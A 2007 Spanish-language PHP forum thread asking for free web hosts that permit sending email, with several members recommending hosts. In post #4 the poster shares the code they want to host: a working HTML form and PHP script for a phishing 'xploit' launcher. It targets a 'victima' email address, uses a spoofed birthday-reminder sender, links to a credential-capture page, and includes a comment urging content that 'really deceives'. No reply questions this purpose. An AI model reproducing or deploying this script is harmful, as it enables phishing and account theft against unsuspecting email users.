Foros del Web » Programando para Internet » PHP »

hosting gratuito que admita sendmail

Estas en el tema de hosting gratuito que admita sendmail en el foro de PHP en Foros del Web. hola!! queria preguntarles si conocen algun hosting gratuito que me permita enviar mails, a traves de un formulario en html y php. porque he oido ...
  #1 (permalink)  
Antiguo 09/09/2007, 11:10
 
Fecha de Ingreso: junio-2006
Mensajes: 166
Antigüedad: 17 años, 10 meses
Puntos: 3
hosting gratuito que admita sendmail

hola!! queria preguntarles si conocen algun hosting gratuito que me permita enviar mails, a traves de un formulario en html y php. porque he oido que iespana admite php pero no te deja enviar mails. Despues probe con phpnet.us y no me abre los archivos php (nose por que), probe con orgfeem y no me sube el archivo html del formulario....
no necesito un hosting poderoso, no importa que sea lento, que tenga publicidad o tenga poco espacio disponible, quiero anda mas enviar mails por formularios!!
  #2 (permalink)  
Antiguo 09/09/2007, 12:14
AlvaroG
Invitado
 
Mensajes: n/a
Puntos:
Re: hosting gratuito que admita sendmail

Lycos Tripod es uno de ellos.

No conozco otros, pero al menos ese funcionaba bien la última vez que probé.


Saludos.
  #3 (permalink)  
Antiguo 09/09/2007, 13:31
 
Fecha de Ingreso: agosto-2007
Mensajes: 42
Antigüedad: 16 años, 8 meses
Puntos: 0
Re: hosting gratuito que admita sendmail

En http://mihost.eu, permite enviar email con php y es gratis, mírate, si este te interesa.
  #4 (permalink)  
Antiguo 09/09/2007, 14:35
 
Fecha de Ingreso: junio-2006
Mensajes: 166
Antigüedad: 17 años, 10 meses
Puntos: 3
Re: hosting gratuito que admita sendmail

sigo con problemas... me registre en lycos y no logro que me lleguen los mails, las paginas se suben bien y no me tira error...
se pego el codigo para que lo chequeen y vean si hay error o les pido que me digan si hay otros factores a tener en cuenta para que lleguen los mails porque soy novata en esto...

el archivo htm

<html>
<head>
<title>Mi Lanzador</title>
<body link="#FFFFFF" vlink="#FFFFFF" alink="#FFFFFF" text="#FFFFFF" bgcolor="#003366">

<center><b><font face="Verdana" size="5">MI LANZADOR1</font></b><p>&nbsp;<br>
</p>
<FORM action="lanzador1.php" method=POST>
<b><font face="Verdana" size="2">Mail de la victima:</font></b> <br>
<input type="text" name="destinatario" align="top" maxLength="50" size="20" value="@hotmail.com">
<br>
<input type="submit" name="Submit" value="Enviar">
</FORM>
<p align="center"><font face="Verdana" size="2">
<a HREF="javascript:history.go(-1);" style="font-weight: 700">
ATRAS</a></font></p>

</html>


el archivo php

<?
header ("Cache-Control: no-cache, must-revalidate");
header ("Pragma: no-cache");


$msg= '<html>

<head>
<title>Mi Lanzador</title>
</head>

<body>
<div style="BACKGROUND-COLOR:white">
<title>Mi Lanzador</title>
<table border="0"><tr><td align="center"><b>
<font face="verdana, tahoma, arial, sans-serif" size="2">EJEMPLO: Visita mi
web, yo que se xD... puras cosas así.</font></b><font face="verdana, tahoma, arial, sans-serif" size="2" color="black"><b><br><BR>
<a target="_blank" href="http://WWW.AQUIMIWEB.COM/conforme.php">http://www.miweb.com</a><br>&nbsp;</b></font><p>
<b><font face="verdana, tahoma, arial, sans-serif" size="2">Aqui puedes poner
el codigo de una targeta, o algo que realmente engañe...</font></b><font face="verdana, tahoma, arial, sans-serif" size="2" color="black"><b><br><br><br><br>&nbsp;</td></tr></table>
</body>

</html>
';
$destinatario = $_POST['destinatario'];
$headers = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";

$headers .= 'From: Recordatorio de Cumplea&ntilde;os <[email protected]>' . "\r\n";
$asunto= '¡Ejemplo Mi Lanzador!';
mail($destinatario, $asunto, $msg, $headers);
$conf="El xploit fue enviado correctamente a $destinatario \n";
echo $conf;

?>

muchas gracias genios!!
  #5 (permalink)  
Antiguo 09/09/2007, 14:39
Avatar de marcopoloaz06  
Fecha de Ingreso: julio-2007
Ubicación: México
Mensajes: 457
Antigüedad: 16 años, 9 meses
Puntos: 11
Re: hosting gratuito que admita sendmail

Registrate en
http://www.freewebhostingarea.com/
esta chido
  #6 (permalink)  
Antiguo 09/09/2007, 18:10
 
Fecha de Ingreso: junio-2006
Mensajes: 166
Antigüedad: 17 años, 10 meses
Puntos: 3
Re: hosting gratuito que admita sendmail

malas noticias me registre en freewebhostingarea.com y me me sube el archivo html, pero me lo sube mal porque dice que ocupa 0kb... nose que mas hacer...
  #7 (permalink)  
Antiguo 10/09/2007, 02:28
Avatar de kaninox  
Fecha de Ingreso: septiembre-2005
Ubicación: In my House
Mensajes: 3.597
Antigüedad: 18 años, 7 meses
Puntos: 49
Re: hosting gratuito que admita sendmail

lycos ya no tiene activado el smtp "para cuentas nuevas" los que tienen cuentas antiguas como yo si pueden aun gozar de esto...
no me se de niuno que permita ya envio de mail...
ahora por ej 110mb cobra por ello :/
__________________
Gokuh Salvo al mundo. PUNTO!!!!
  #8 (permalink)  
Antiguo 10/09/2007, 04:15
Avatar de marcopoloaz06  
Fecha de Ingreso: julio-2007
Ubicación: México
Mensajes: 457
Antigüedad: 16 años, 9 meses
Puntos: 11
Re: hosting gratuito que admita sendmail

Ps az el Archivo ahi mismo registrate en
http://www.6te.net
Le das y veras ke si es muy Bueno ese Serv.
Como vez en la entrada dice mail() enable
  #9 (permalink)  
Antiguo 10/09/2007, 07:25
 
Fecha de Ingreso: junio-2006
Mensajes: 166
Antigüedad: 17 años, 10 meses
Puntos: 3
Re: hosting gratuito que admita sendmail

el correo que me ofreciste es el mismo que el hostingarea nada mas que con distinto subdominio y el problema que tube ahi es que no me toma el arcchivo del formulario html de envio del mail (el archivo lo puse en una respuesta arriba)
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Tema Cerrado




La zona horaria es GMT -6. Ahora son las 14:35.